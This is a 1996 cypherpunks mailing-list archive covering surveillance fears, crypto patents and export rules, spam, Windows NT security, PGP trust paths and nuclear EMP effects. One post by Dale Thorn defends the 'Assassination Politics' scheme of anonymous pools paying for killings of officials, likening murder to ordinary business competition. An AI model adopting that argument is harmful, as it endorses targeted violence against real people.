> chaperone (paid by the mall) at the Passaic Mall.  Will be carded.
> The use of ATM's at night will be banned.
> Payphones will be eradicated in one area : they attract drug
> dealers, et al.
> I don't like where we are headed. This is only started.

> On Tue, 1 Oct 1996, Dustbin Freedom Remailer wrote:
> > On Tue, 1 Oct 1996, Black Unicorn wrote:
> > > Any person congregating in a group of 2 or more persons on
> > > public space within the boundaries of this drug free zone for

> > Keep moving, proles.  The War on Some Drugs must continue.  Now
> > excuse me while I join my friends for a joint.

Did y'all see the NBC (I think, got this from a friend) ad for the new
monitoring system for cars?  It's based apparently on the lo-jac 
(spelling unsure) technology, but expanded so the monitor can locate the 
car anytime immediately, and can determine all car statuses such as 
whether the engine is on (and the monitor can kill that), how much gas 
is in the car, whether the windows are up, roof up, everything 
basically.  So if they want to detain somebody, they turn off the 
engine, put the windows up, lock the doors, and have someone come and 
get you (you're locked in until they get there, see).

BTW, this is a reality now.  This was an ad for a current service.
This apparently is part of the reason why all cars now are moving in the 
direction of more electronic features, all of which can be put under 
centralized control.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Adam Back <aba@dcs.ex.ac.uk>
Date: Sun, 6 Oct 1996 17:44:51 +0800
To: mccoy@communities.com
Subject: Re: Fighting Clipper III
In-Reply-To: <v03007804ae79cbf6480a@[205.162.51.35]>
Message-ID: <199610050114.CAA00090@server.test.net>
MIME-Version: 1.0
Content-Type: text/plain



Jim McCoy <mccoy@communities.com> writes:
> Declan McCullagh <declan@eff.org> writes:
> >You'll have trouble doing a successful boycott of RSA. What, you won't
> >use Netscape Navigator or PGP?
> 
> Actually RSA is not a hard target for people like us to threaten.  The
> Diffie-Hellman patent expires in 210 days.  Cylink is prevented from taking
> legal action against anyone for violating this patent while the current
> lawsuit is being decided.  When Diffie-Hellman expires ElGamal is available
> for use for free.  So the best threat one can make against RSA is to directly
> challenge their revenue stream: start working on making ElGamal an available
> option in all systems which use RSA.

PGPfone uses Diffie-Hellman.  PGP 3.0 is using El Gamal.

Seems Zimmermann/PGP Inc are already not using RSA, for patent reasons
I think.  Also I believe they are not using IDEA either, and using
CAST, Blowfish, 3DES in PGPfone, 3DES in PGP 3.0(?).  (Ascom-tech got
greedy).

Adam
--
#!/bin/perl -sp0777i<X+d*lMLa^*lN%0]dsXx++lMlN/dsM0<j]dsj
$/=unpack('H*',$_);$_=`echo 16dio\U$k"SK$/SM$n\EsN0p[lN*1
lK[d2%Sa2/d0$^Ixp"|dc`;s/\W//g;$_=pack('H*',/((..)*)$/)




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: attila <attila@primenet.com>
Date: Sat, 5 Oct 1996 18:54:03 +0800
To: "John C. Randolph" <jcr@idiom.com>
Subject: Re: "Mormon Asshole?" re: GAK
In-Reply-To: <199610041936.MAA29441@idiom.com>
Message-ID: <199610050800.BAA00792@infowest.com>
MIME-Version: 1.0
Content-Type: text/plain


In <199610041936.MAA29441@idiom.com>, on 10/04/96 
   at 12:36 PM, "John C. Randolph" <jcr@idiom.com> said:

-.Attilla Says:

-.>but what inflames the anti-mormon passions the most is the 
-.>paid clergy of other organized religions whose employment is 
-.>the paid ministry to their flock.  Mormons threaten their jobs;  
-.>the mormons have no paid ministry; it is all part of our 
-.>"callings" to do the Lord's work.

-.Well, speaking as one who has occasionally been called anti-mormon (although,
-.I'm *really* not that specific!) The only time I feel any anti-mormon
-."passion" is when I want to throttle one of your missionaries.  I like
-.sleeping in, and being awakened by a kid who wants me to join a religion is
-.really offensive.
-.
        come, come, John...   you would deny those bright, eager faces
    of our missionaries, who spent several years earning the money to be
    able to support themselves on a two year mission?

        and, they do not "ask" you to join our religion;  they are only
    offering you the chance to "investigate" our religion; your decision to
    join is based solely on your willingness to pray, by yourself, 
    asking the Lord if joining the Church of Jesus Christ and the Latter
    Day Saints is the _right_ thing to do, a true Church of Jesus and
    the Lord.   

        It is not for our missionaries to ask you to join the Church; 
    they are only to assist you in your _investigation_ of our Church.
    Don't worry, I realize some overreach their mission authority with
    their enthusiasm.  

        However, if you are ever pushed by a missionary, send his/her 
    name to me and I will pass the information along to the mission 
    leadership that they might pause and potentially dampen his/her 
    fire a little bit.  it happens, as to be expected.  

        BTW, the mission leaders are adult couples who volunteer for 
    3 years. we had a man in our ward who was close to 70 accept a 
    calling with his wife to oversee land acquistion and construction 
    all over the Far East --he was out there almost 10 years -- he and 
    his wife had 11 children and he is now close to 90 --still going 
    (falls asleep in his chair after dinner....).

       please just remember these kids are filled with their youthful 
    zeal and the exuberance of their mission.  they are some of our 
    best kids, and they are giving two years (10% of their life to date)
    for their service.  I really regret that I did not go on a mission at
    19 --interrupting college for 2 years.   Harvard had no provision
    for it, and I surrendered my chance over 37 years ago. 

-.If the LDS church would just give up this damnable proselytizing, I'd find
-.you no more objectionable than the Tibetan Buddhists (whom I actually hold in
-.rather high regard, 
-.

        our Articles of Faith include the missions.  our first 
    missionaries covered amazing distances in the mud, and generally on
    foot starting in 1830, the year the Church was founded, covering 
    much of the Eastern U.S. and Canada plus very rewarding missions 
    to England, Europe, Scandinavia, and even to Australia/NZ/Tahiti in 
    the first 15 years.  there is an enormous population of LSD members
    in the Solomon Island area today.

        and we belief that everyone should be permitted to practice
    religion in any way they choose (or not choose), only asking that 
    we be shown the same consideration.  we will even fight to grant
    you that right!  or give you, without cost, the use of our chapels
    if you do not have your own.  For instance, the Catholic Church
    managed to start their congregations in Utah by using our chapels
    in the 1850s.

-.although they're never going to convert me either!)
-.
        try investigating and see if you still can make that 
    statement! <g>

        what would you do if you found yourself "volunteering" to 
    accept the LDS faith?
    

-.-jcr

-.PS:  I do think it's a Good Thing that mormons don't pay the clergy. 
-.
        accepting the call to be the Bishop is an enormous responsi-
    bility, sometimes without much encouragement in some wards
    where there are spiritual or family problems above the norm. We
    are not perfect.

-.One positive for LDS.  Did you pick up that idea from the Ba'ha'i?

        I seriously doubt it; Joseph Smith never would have known about
    the Ba'ha'i, or even Buddism.

--
  "I don't make jokes. 
    I just watch the government and report the facts."
        --Will Rogers





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: The Deviant <deviant@pooh-corner.com>
Date: Sat, 5 Oct 1996 19:49:33 +0800
To: Greg Broiles <gbroiles@netbox.com>
Subject: Re: Fw: Re: ITAR satellite provision
In-Reply-To: <3.0b28.32.19961004164704.006bc324@ricochet.net>
Message-ID: <Pine.LNX.3.94.961005053237.4404A-100000@anx0918.slip.appstate.edu>
MIME-Version: 1.0
Content-Type: text/plain


On Fri, 4 Oct 1996, Greg Broiles wrote:

> At 08:09 PM 10/4/96 +0000, The Deviant wrote:
> 
> >So.. if I were to take PGP, put it on a floppy disk, tape it to a model
> >rocket, and launch it across the mexican border, that's not exporting it
> >(although the FAA might complain)?
> 
> As I read the regs, it's not an export at the moment it's launched, but
> it's almost certainly an export when it reaches Mexican airspace or when it
> touches Mexican soil.
> 

Well now, I didn't send it accross the border.  I sent it up.  wind sent
it accross the border.

>
> The "rocket exception" is not useful vis-a-vis crypto. Period. I'm very
> sorry I ever had anything to do with this thread and I'm not posting about
> it again. 
> 


 --Deviant
Live long and prosper.
                -- Spock, "Amok Time", stardate 3372.7






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Simon Spero <ses@tipper.oit.unc.edu>
Date: Sat, 5 Oct 1996 21:11:24 +0800
To: Dale Thorn <dthorn@gte.net>
Subject: Re: Signs of Trouble in D.C.
In-Reply-To: <32562130.1B99@gte.net>
Message-ID: <Pine.SUN.3.91.961005072244.26349A-100000@tipper.oit.unc.edu>
MIME-Version: 1.0
Content-Type: text/plain


[lojack variant with immobiliser]

Movie fans will be glad to know that the UK variant of this scheme is 
known as Skynet (there's also an RAF comsat system)

Simon

---
If I can get my key back,   it's Key Recovery
If you can get my key back, it's Key Escrow





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: John Fricker <jfricker@vertexgroup.com>
Date: Sun, 6 Oct 1996 01:06:56 +0800
To: cypherpunks@toad.com
Subject: RE: WINDOWS NT ????
Message-ID: <19961005145216660.AAA122@dev.vertexgroup.com>
MIME-Version: 1.0
Content-Type: text/plain


>Adamsc (Adamsc@io-online.com) said something about Re: WINDOWS NT ???? on or about 10/5/96 1:00 AM

>
>Microsoft claims C2 or higher for NT and deserves any ragging they get if
>it's not.   Ditto for any other vendor who claims one thing and sells
>another.

You ought to read about C2. 

DIdn't Steve Martin say something like "criticize things you don't know about".

>BTW:  Bizarre NT Quirk #15413 -  The Administrator account does not have
>access to the entire disk.  You got it - if you're the administrator you
>still cannot look into certain directories belonging to another user - even
>if you've given all access privileges to the Admin account.  Got a few
>chuckles at work.
>

It's not rocket science to defeat this. The administrator is prevented from casually peering into user owned directories but any administrator worth a nickle can tap tap click and have access to any directory. 







From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "! Drive" <drink@aa.net>
Date: Sun, 6 Oct 1996 01:44:53 +0800
To: <cypherpunks@toad.com>
Subject: Re: Who the heck is "CYBERPROMO" and why are they spamming me?
Message-ID: <199610051503.IAA11579@ws6.aa.net>
MIME-Version: 1.0
Content-Type: text/plain



Here's a note I got when trying to reply to some JUNK mail I got...


Version 9-30-96:


Cyber Promotions has started to implement stricter Terms of Service
policies WITH TEETH.  We have just recently terminated several accounts for
abuse of our policies.  (Updated TOS at end of message).

The following email accounts have been *recently TERMINATED...

*changes@answerme.com         9-30-96: Unsolicited ads to INTERNET addresses
*changes@cyberpromo.com       9-30-96: Unsolicited ads to INTERNET addresses
*changes@savetrees.com        9-30-96: Unsolicited ads to INTERNET addresses

*catalog@savetrees.com        9-30-96: Unsolicited ads to INTERNET addresses
*catalog@cyberpromo.com       9-30-96: Unsolicited ads to INTERNET addresses
*catalog@answerme.com         9-30-96: Unsolicited ads to INTERNET addresses

*eleven@answerme.com          9-28-96: Forgeries
*eleven@savetrees.com         9-28-96: Forgeries
*eleven@answerme.com          9-28-96: Forgeries

*tsahk@cyberpromo.com         9-27-96: Unsolicited ads to INTERNET addresses
*tsahk@answerme.com           9-27-96: Unsolicited ads to INTERNET addresses

*icssender@omni.cyberpromo.com   9-19-96: FORGED unsolicited email, making
it appear that Cyberpromo's auto-sender was responsible.  If you are in
receipt of the message, please look through the headers and complain to the
appropriate postmasters.

networkes@answerme.com       9-17-96: Ignored remove requests
networkes@cyberpromo.com     9-17-96: Ignored remove requests
networkes@savetrees.com      9-17-96: Ignored remove requests
reminders@answerme.com       9-17-96: Unsolicited ads to INTERNET addresses
reminders@savetrees.com      9-17-96: Unsolicited ads to INTERNET addresses
reminders@cyberpromo.com     9-17-96: Unsolicited ads to INTERNET addresses

salespromo@answerme.com      9-16-96: Unsolicited ads to INTERNET addresses
salespromo@savetrees.com     ""  ""         ""  ""
salespromo@cyberpromo.com    ""  ""         ""  ""
promo@answerme.com           ""  ""         ""  ""
promo@savetrees.com          ""  ""         ""  ""
promo@cyberpromo.com         ""  ""         ""  ""
info4free@answerme.com       ""  ""         ""  ""
info4free@savetrees.com      ""  ""         ""  ""
info4free@cyberpromo.com     ""  ""         ""  ""

manda@cyberpromo.com      8-28: Massive abuse to INTERNET addresses / FORGERY
manda@answerme.com        8-28: Massive abuse to INTERNET addresses / FORGERY
website@cyberpromo.com    8-27: excessive abuse to AOL / removals ignored
sevenmil@cyberpromo.com   8-27: excessive abuse / all removals ignored
sevenmil@answerme.com     8-27: ""     ""      ""     ""     ""    ""
vera@cyberpromo.com
vera@answerme.com
zol@answerme.com
website@answerme.com
allied@cyberpromo.com
allied@answerme.com
lists@cyberpromo.com
lists@answerme.com


If you have a complaint about an account that was not listed above, please
forward it to our President's personal account:  wallace@cyberpromo.com

We currently operate the following servers:
answerme.com
cyberpromo.com
omni.cyberpromo.com
gamut.cyberpromo.com

We DO NOT operate the following servers:
uunet
interramp
athens.servint
cais
postman.com
powernet
pwrsite


Cyber Promotions is *not* in business to annoy people.  We are in the
business of sending (and assisting in sending) commercial (and
noncommercial) email to people who are *not* offended by the receipt of
these messages.  Unfortunately, due to many experiences (many of which were
out of our control) we have had some problems accomplishing our goals
without upsetting some people.  We are truly sorry about that fact, and we
plan to "clean up the streets" as best as we can.

Some people have been under the impression that all email that appears to
come from cyberpromo.com, is from Cyber Promotions.  That is not true.
Most of the complaints that we have recently received have been in reaction
to people who have "autoresponders" and "virtual email addresses" on our
system.  In that case, their mail would have referenced an account on our
system, but originated from a different site.  Unfortunately, software like
Pegasus enables their mail to appear as if it came from us, driectly.  But,
their true origination is still evident in the headers.  You can determine
where it originated if you know how to decode headers.  But when doing so,
remember that Pegasus, for example, actually logs into *our* sendmail.  At
this time, the only messages that originate from Cyber Promotions, use our
proprietary Cyber Sender 2.1+ protocol which will always be indicated in
the organization: header.

Due to these "look alikes," it could appear that recipients' remove request
were being ignored.  WE DO NOT IGNORE REMOVE REQUESTS.

We now also maintain a "master" remove list of people who have asked to be
removed from all commercial mailing lists.  If you have received an email
from "Cyber Sender 2.1+", our new proprietary transport agent protocol,
then the remove features *do* work properly, now that all of the bugs have
been fixed (uppercase and lowercase now match, too).  No mail is allowed
out of our system, if the recipient's address is in our master remove list.
We currently have over 1.1 million email addresses in that file.  If you
wish to add your address to that master remove list, you can do so in two
different ways.  1.  You can send an email to remove@cyberpromo.com and
type "REMOVE ALL" in the subject or message field.  Our systems will
automatically permanently remove from our system the email address from
which you sent your request.  2.  You may also send an email to
manremove@cyberpromo.com and type as many email addresses as you wish in
the body of the message, each on its own line, without any comments.  The
subject line is ignored.  That address will also permanently remove the
addresses.  Please note: we have no control over mail that originates from
other sites, that travel through our SMTP (relay-host) servers.  We will
simply terminate any accounts that we maintain, that is referred to in
their abusive mail.


ATTENTION PRODIGY MEMBERS:
It has come to Cyber Promotions' attention, that some of you are having a
major problem removing yourselves from our lists.  This can be attributed
to the "alias" that your outgoing mail may contain.  If you are having
problems, please send an email to manremove@cyberpromo.com and type both of
your email addresses in the body of the message, each on its own line,
without any comments.  The subject line is ignored.  You probably have one
address like xazd35r@prodigy.com and another address like
sanford@prodigy.com.


ATTENTION PIPELINE MEMBERS:
It has come to Cyber Promotions' attention, that some of you are having a
major problem removing yourselves from our lists.  This can be attributed
to the "alias" that your outgoing mail may contain.  If you are having
problems, please send an email to manremove@cyberpromo.com and type your
email addresses in the body of the message, each on its own line, without
any comments.  The subject line is ignored.  You should type your email id
followed by the following THREE domains.   @usa.pipeline.com,
@pipeline.com,  @nyc.pipeline.com.  Even if you feel that your address is
definately only one of the three possibilities, you should still remove all
three addresses (each on its own line).


ATTENTION INTERNET USERS:
It has come to Cyber Promotions' attention, that some of you are having a
major problem removing yourselves from our lists.  This can be attributed
to the "alias" that your outgoing mail may contain.  If you are having
problems, please send an email to manremove@cyberpromo.com and type your
email addresses in the body of the message, each on its own line, without
any comments.  The subject line is ignored.  If your email address could
contain an alias like mail.domain.com or if you may have more that one
email address that points to another email address, you should remove them
all.  If you wish to remove *every* email address in your domain, please
contact us, and we will "grep" out every possibility.




REVISED TERMS OF SERVICE:

(We are also looking into the possibility that we may be forced to adopt
the policies of our backbone providers.  For the time being, we are
emulating their policies as best as we can while matching the needs of our
operations.)


1. We do not allow postings to inappropriate
newsgroups with reference to your account
because such postings result in *MUCH* more negative
response than positive.

2. We prohibit the advertising of offensive material
(ie. pornography, weapons, etc).

3. You may not use the account to participate in
illegal activities.

4. Our TOS strictly prohibits the sending of mass commercial
emails to INTERNET addresses, unless expressed permission
has been granted to you by the recipient.
In addition, you *must* honor all requests for removal
from your mailing list in a diligent manner.
Our service can be used in conjunction with advertisements that
you place with a bulk email company other than your
own or us, as long as they follow the same guidelines.

5.  Cyber Promotions reserves the right to terminate any account for any
reason at any time, without notice.


If you would like to send a complaint about any account @cyberpromo.com or
@answerme.com or @omni.cyberpromo.com  that has not been terminated, please
send email to: wallace@cyberpromo.com


----------
: From: Ernest Hua <hua@chromatic.com>
: To: cypherpunks@toad.com
: Cc: hua@chromatic.com
: Subject: Who the heck is "CYBERPROMO" and why are they spamming me?
: Date: Saturday, October 05, 1996 12:25 AM
: 
: I keep getting mail from an "abusebot@savetrees.com" ...
: 
: This is getting very very annoying.
: 
: Ern




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Aviel Rubin <rubin@usenix.ORG>
Date: Sun, 6 Oct 1996 01:48:03 +0800
To: cypherpunks@toad.com
Subject: Paths of trust in PGP
Message-ID: <199610051534.IAA13534@usenix.ORG>
MIME-Version: 1.0
Content-Type: text/plain



There is a really cool service being offered on the web. It allows
users to trace the paths of trust between two keys in the PGP world.
It is worth checking out:

  http://www.research.att.com/~reiter/PathServer/

This is a good way to find the paths you want in the web of trust.
For example, you can type in your key id, and the key id of a new,
candidate key, and you will find all of the signature paths
from your key to the new key. You'll be surprized at how connected
the graph is.

Avi




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: nobody@cypherpunks.ca (John Anonymous MacDonald)
Date: Sun, 6 Oct 1996 02:18:51 +0800
To: cypherpunks@toad.com
Subject: Re: Paths of trust in PGP
Message-ID: <199610051615.JAA19194@abraham.cs.berkeley.edu>
MIME-Version: 1.0
Content-Type: text/plain


On .cypherpunks, <rubin@usenix.ORG> writes:
>There is a really cool service being offered on the web. It allows
>users to trace the paths of trust between two keys in the PGP world.
>It is worth checking out:
>
>  http://www.research.att.com/~reiter/PathServer/
                       ^^^^^^^

Use it and help AT&T bring key escrow to your door.

No thanks.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Timothy C. May" <tcmay@got.net>
Date: Sun, 6 Oct 1996 02:54:09 +0800
To: cypherpunks@toad.com
Subject: Re: Electromagnetic Pulse
In-Reply-To: <199610050620.XAA14223@mail.pacifier.com>
Message-ID: <v03007800ae7c4c246bdb@[207.167.93.63]>
MIME-Version: 1.0
Content-Type: text/plain


At 11:19 PM -0800 10/4/96, jim bell wrote:
>At 08:46 PM 10/4/96 -0800, Timothy C. May wrote:
>
>>
>>The key is that the effects of near-ground-level bursts are _extremely_
>>localized. Shocking so, no pun intended. The largest bomb in the U.S.
>>arsenal, believed to be 20 MT, might leave a crater several miles in
>>diameter, but would hardly be felt 30 miles away. Certainly almost no
>>electronic devices would be damaged, except if close to the blast center.
>>
>>--Tim May
>
>What about the neutrons?  What is the effect of a neutron flux on silicon
>devices?

This is starting to get far afield from CP, so I'll make this my last
comment on this thread.

Neutrons have low crossection for interacting with silicon (percentage that
interact per unit length...for the few microns of active surface of a chip,
a tiny, tiny fraction interact). Charts and tables are availabel in the
literature for the effects of various fluences on various devices, cf. the
December issue of any year of "IEEE Transactions on Nuclear Science." Or do
a Web search on "single event upset" and/or "soft error."

As it happens, I did a series of calculations about the effects of a
neutron fluence (n/cm^2) on various types of silicon devices, doped various
ways. (The doping is crucial, because the primary effect is a neutron
interacting with a boron atom. Boron is one of the dopants used in some
types of devices. In small amounts, of course.) In rare cases a neutron
interacts with a boron and yields an alpha particle, which has known
effects in some devices.

(Quantification of the effect depends on fluence of neutrons, their energy
(normal vs. "thermal"), the device details, the doping concentration, the
sensititivity to alphas, etc.)

And then there's the inverse-square law. Even if their were sufficient
neutron fluences near the blast center to affect devices, there would be
almost no effect a few klicks away.

("Total dose" failure, as opposed to single-event upset, or soft error,
requires fluences in very high levels. As it turns out--in case anyone is
thinking of neutron bombs!--the fluences, or doses, needed to make people
sicken and die are much lower than what will kill a modern device--partly
due to the details mentioned above, partly due to the very thin active
layer, partly due to a bunch of other factors.)

--Tim May

"The government announcement is disastrous," said Jim Bidzos,.."We warned IBM
that the National Security Agency would try to twist their technology."
[NYT, 1996-10-02]
We got computers, we're tapping phone lines, I know that that ain't allowed.
---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May              | Crypto Anarchy: encryption, digital money,
tcmay@got.net  408-728-0152 | anonymous networks, digital pseudonyms, zero
W.A.S.T.E.: Corralitos, CA  | knowledge, reputations, information markets,
Higher Power: 2^1,257,787-1 | black markets, collapse of governments.
"National borders aren't even speed bumps on the information superhighway."








From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: attila <attila@primenet.com>
Date: Sat, 5 Oct 1996 19:55:20 +0800
To: Dale Thorn <dthorn@gte.net>
Subject: Re: Signs of Trouble in D.C.
In-Reply-To: <32562130.1B99@gte.net>
Message-ID: <199610051100.FAA01842@infowest.com>
MIME-Version: 1.0
Content-Type: text/plain


        and, if you add the biochip (with a low power spread spectrum 
    which your vehicle picks up, the can monitor your blood pressure,
    urine level, colon blockage and gas level, your driving hostility,
    and, of course, your blood alcohol and dope level plus positive ID
    the driver and passengers. One presumes the system is smart 
    enough to discrimate age and other factors to separate the 
    occupants IDs.

In <32562130.1B99@gte.net>, on 10/05/96 
   at 01:49 AM, Dale Thorn <dthorn@gte.net> said:

-.Did y'all see the NBC (I think, got this from a friend) ad for the new
-.monitoring system for cars?  It's based apparently on the lo-jac  (spelling
-.unsure) technology, but expanded so the monitor can locate the  car anytime
-.immediately, and can determine all car statuses such as  whether the engine
-.is on (and the monitor can kill that), how much gas  is in the car, whether
-.the windows are up, roof up, everything  basically.  So if they want to
-.detain somebody, they turn off the  engine, put the windows up, lock the
-.doors, and have someone come and  get you (you're locked in until they get
-.there, see).

-.BTW, this is a reality now.  This was an ad for a current service. This
-.apparently is part of the reason why all cars now are moving in the 
-.direction of more electronic features, all of which can be put under 
-.centralized control.



--
  "I don't make jokes. 
    I just watch the government and report the facts."
        --Will Rogers





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: roy@sendai.scytale.com (Roy M. Silvernail)
Date: Sun, 6 Oct 1996 02:09:20 +0800
To: adamsc@io-online.com (Chris Adams)
Subject: Re: WINDOWS NT ????
In-Reply-To: <19961005065648125.AAA235@GIGANTE>
Message-ID: <961005.095652.1y4.rnr.w165w@sendai.scytale.com>
MIME-Version: 1.0
Content-Type: text


-----BEGIN PGP SIGNED MESSAGE-----

In list.cypherpunks, adamsc@io-online.com writes:

> Microsoft claims C2 or higher for NT and deserves any ragging they get if
> it's not.   Ditto for any other vendor who claims one thing and sells
> another.

The NT Resource Kit has a cute little C2 compliance advisor that steps
you through a number of points that affect the C2 compliance of the
system.  My favorite is the section under 'Networks'.  It simply says
"C2 compliance require that the machine not be connected to a network."

Drawing from another message (attribution lost, sorry), if you have the
NT DDK, you need not be a particularly clever device driver writer to
write a malicious driver.  The DDK comes with _lots_ of example source
code.  You need one of {deep pockets | beneficient employer} to equip
for mayhem, though.  (MSDevNet Pro subscription is $499 and VC++ 4.0
subscription is ~$395) (thanks, boss!)
- -- 
           Roy M. Silvernail     [ ]      roy@scytale.com
DNRC Minister Plenipotentiary of All Things Confusing, Software Division
PGP Public Key fingerprint =  31 86 EC B9 DB 76 A7 54  13 0B 6A 6B CC 09 18 B6
                Key available from pubkey@scytale.com

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQCVAwUBMlZ64Bvikii9febJAQHcGQP/SiNL6Omfm1RJi4/yG+CyrXG6QdmtHIKR
66MOC1c0mwiSVSdoE9sM+BnX6qy3XYDQOb6E2N/0R2fgb755Ntcba30T1EPvxH08
J2C4O9sbGhsk7O5TM3JRttQ6rnV9WIeTRfuNx4/PkGPqty/SeRVgUxeZO76l1oEr
5m/8uop1epw=
=CeS9
-----END PGP SIGNATURE-----





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: ratak (Jason E.J. Manaigre) <ratak@escape.ca>
Date: Sun, 6 Oct 1996 00:59:55 +0800
To: shamrock@netcom.com
Subject: Re: Can we kill single DES?
Message-ID: <199610051501.KAA04805@wpg-01.escape.ca>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

Mime-Version: 1.0
Content-Type: text/plain
Content-Transfer-Encoding: 7bit

To: shamrock@netcom.com, cypherpunks@toad.com
Date: Sat Oct 05 10:00:15 1996

> Sorry, not a chance. The symmetric cipher used in Ecash is 3DES. Since 
> DigiCash has the good fortune to be located in The Netherlands, full 
> strength crypto can be (and is) used in all their products.
> 
> I would advise any company suffering from a loss of competitiveness due
>  to 
> US export regulations to do the logical thing and move their operation 
> to a more suitable location.
> 
> --Lucky
> 
> 

        And which Countries would that be? I haven't seen list of what 
Crypto is allowed in which countries...

Does anyone know for sure...

And companies will be hurt by this whole situation, and I can imagine the 
crap that will sneak into Firewall-1's code when Sun brings it up to GAK 
standards....




___________________________________________________________________
GarGoyle Securities
- -Intrusion Assessment Systems
- -Security Consultation/Education/Curriculum Development
- -Project Management/Research/Analysis World Wide...
- -Member of CITDC (Canadian International Trade Development Council)
- -Email 1: <ratak@escape.ca> Jason E.J. Manaigre
- -Email 2: <ratak@GargSec.mb.ca>
- -Email for PGP key with phrase 'Get Public Key' as Subject
- -2048 PGPKey iD E2 FA 30 E5 F5 AD EC F3  00 9A 9D 33 59 FC DF AD
___________________________________________________________________

-----BEGIN PGP SIGNATURE-----
Version: 2.6.3i
Charset: noconv

iQEVAwUBMlZ4BvqtmO8M92GRAQFRDwgA1zWSKNo9wNLI7AMguNWWC/QzDkRKJpx6
a2qZZ/AwbKCh1xClg0ZOVO0PlpRm4uH7A/fJEjh+Yp+S3YkYSge7kdOOwmUhWTYG
cJYf580dNWcIBPAUkMEljXRXdVlFpTX9N0ktnvzirNLd4+KtcqU4tuluoH2a9dDq
6SV42v9P3v9P57UqxrSz7GlEoYI4NJtVmArhI486p8D4yhqVBwIGcxWGw48VArzc
JT20uLZU8abqYEDR4siRBUKbey95NTuRK8GgnFTK6K5LFKpTsjcRs+Ye4NtR1+xF
CzHUelzPB57FXkN8fXkVwwLnFGDF6nHlhdpULytLY70z8coq9sTLpQ==
=mAmF
-----END PGP SIGNATURE-----





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Dale Thorn <dthorn@gte.net>
Date: Sun, 6 Oct 1996 03:53:56 +0800
To: attila <attila@primenet.com>
Subject: Re: [SARCASM] [RANT] Re: The Right to Keep and Bear Crypto
In-Reply-To: <199610051202.GAA04320@infowest.com>
Message-ID: <325695E7.1449@gte.net>
MIME-Version: 1.0
Content-Type: text/plain


attila wrote:
> In <v02130500ae79cef28e84@[10.0.2.15]>, on 10/03/96
>    at 09:02 PM, azur@netcom.com (Steve Schear) said:

[some text deleted]

> CAVEAT:  under no conditions could I ever condone Jim Bell's
> Assassination Politics --it may be anarchistic in and of itself, but
> it is a thinly disguised criminal amentality, not only from the
> extant of trying to 'moralize' murder, but a form of power politics
> (and shadow government) which actually exceeds the abuses of our
> supposedly democratic republic run amuk with abusive police powers.
> Not only is revenge politics immoral, but AP is a corruption of
> society by lawless and arbitrary behavior of a few players who can
> afford the price of entry (to the betting pools).

You seem to be missing or confusing some points:
AP, as I understand it, is not necessarily revenge, any more than any 
other type of business deal.  You don't stab the competitor primarily 
because you wanna get revenge, you just do it as a practical matter, to 
lessen the competition.  You fail to grasp the predatory reality of what 
humans really are, and in that failure of illumination, you succumb to 
the illusion that humans are something closer to divine spirits than, 
say, a hawk, an eagle, or a wildcat.

Your religious beliefs are fine, I'm sure, as far as they go, but if you 
can agree with the principle of "separation of church and state", then 
you should see that trying to apply one's own personal religious 
convictions in dealing with the people who run Mother Earth is a fool's 
game.  Go to church, worship God, then, when you're doing business, 
treat people with the same courtesy you'd want from them.  The original 
Golden Rule.

You already agree that police killings *may* be justified, i.e., are not 
necessarily murder, then, as though "the people" have no right to apply 
the same techniques themselves (they "must" surrender this option to the 
state etc.), you label what the people would do as murder.  Bottom line 
is not whether AP would be murder, but whether you think the people have 
an inherent obligation to always surrender the right to kill to govt. 
authorities, even in a state where the govt. authorities are far beyond 
the point of "trust".

The last point about only a few players being able to afford AP is also 
shortsighted, from what I understand.  The collective anonymous 
contributions of a lot of little people could help unseat a much larger 
tyrant, which should go a long way in helping the tyrant control 
him/herself.






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Dale Thorn <dthorn@gte.net>
Date: Sun, 6 Oct 1996 03:45:14 +0800
To: Ernest Hua <hua@chromatic.com>
Subject: Re: Who the heck is "CYBERPROMO" and why are they spamming me?
In-Reply-To: <199610050725.AAA10682@krypton.chromatic.com>
Message-ID: <32569775.731B@gte.net>
MIME-Version: 1.0
Content-Type: text/plain


Ernest Hua wrote:
> I keep getting mail from an "abusebot@savetrees.com" ...
> This is getting very very annoying.

Fascinating, isn't it?  Whatever they're trying to protect me from I'm 
not getting, I'm only getting their trash. Better to just filter it out.

And speaking of being "protected" by the system, did anyone notice the 
several hundred billboards around L.A., all solid black background, with 
large white letters (all caps) that say "STILL GUILTY"?

I drove up Crenshaw from the 405 to Wilshire, and saw maybe 15 or 20 on 
Crenshaw alone.  Looks like somebody's trying to start a war (Simpson 
case, no doubt).






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Dale Thorn <dthorn@gte.net>
Date: Sun, 6 Oct 1996 03:45:11 +0800
To: jim bell <jimbell@pacifier.com>
Subject: Re: Electromagnetic Pulse
In-Reply-To: <199610050620.XAA14223@mail.pacifier.com>
Message-ID: <32569876.2793@gte.net>
MIME-Version: 1.0
Content-Type: text/plain


jim bell wrote:
> At 08:46 PM 10/4/96 -0800, Timothy C. May wrote:
> >The key is that the effects of near-ground-level bursts are
> >extremely_ localized. Shocking so, no pun intended. The largest bomb
> >in the U.S. arsenal, believed to be 20 MT, might leave a crater
> >several miles in diameter, but would hardly be felt 30 miles away.
> >Certainly almost no electronic devices would be damaged, except if
> >close to the blast center.

> What about the neutrons?  What is the effect of a neutron flux on
> silicon devices?

I hope somebody is allowing for multi-pulse and coherent 
(uni-directional) directed energy weapons.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
